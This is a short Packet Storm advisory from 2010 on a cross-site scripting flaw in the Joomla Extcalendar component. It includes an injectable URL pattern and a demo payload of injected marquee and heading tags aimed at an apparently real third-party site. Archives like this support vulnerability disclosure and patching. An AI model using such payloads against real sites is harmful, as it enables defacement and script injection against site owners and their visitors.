Joomla Extcalendar Cross Site Scripting

2010-05-18T00:00:00
ID PACKETSTORM:89593
Type packetstorm
Reporter s4r4d0
Modified 2010-05-18T00:00:00

Description

                                        
                                            `  
  
  
[x] Joomla Component Extcalendar  
[x] Date: 15/05/2010  
[x] Author: s4r4d0  
[x] Contact: s4r4d0@yahoo.com  
[x] Team; Fatal Error  
[x] Bug: XSS on Component Extcalendar  
[x] Example: http://www.site.com/index.php?option=com_extcalendar=[XSS]  
[x] Demo:http://www.ctsalsa.com/cms/index.php?option=com_extcalendar=">><marquee><h1>XSS By Fatal Error</h1><marquee>  
[x] Made in Brazil  
  
  
  
  
  
  
`